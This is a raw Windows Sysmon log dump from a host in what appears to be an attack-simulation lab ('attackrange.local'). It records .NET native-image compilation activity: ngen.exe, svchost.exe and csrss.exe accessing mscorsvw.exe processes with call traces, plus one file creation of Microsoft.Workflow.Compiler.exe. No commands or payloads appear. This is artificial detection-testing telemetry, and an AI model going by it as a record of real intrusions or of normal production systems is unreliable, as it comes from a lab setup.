13:46:31.969{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1B02-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1A02-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.906{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1A02-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1A02-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1902-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.875{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1902-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.875{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1902-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.828{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1802-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.812{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1802-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.812{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1802-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1702-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.765{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1702-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1702-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:46:31.703{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e6c-0\Microsoft.Workflow.Compiler.exe2021-01-18 13:46:31.703 10341000x80000000000000006245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.593{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.593{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1602-00000000A301}3692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.468{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1502-00000000A301}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.452{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1502-00000000A301}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.452{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1502-00000000A301}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1402-00000000A301}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.406{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1402-00000000A301}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.406{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1402-00000000A301}5056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1302-00000000A301}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 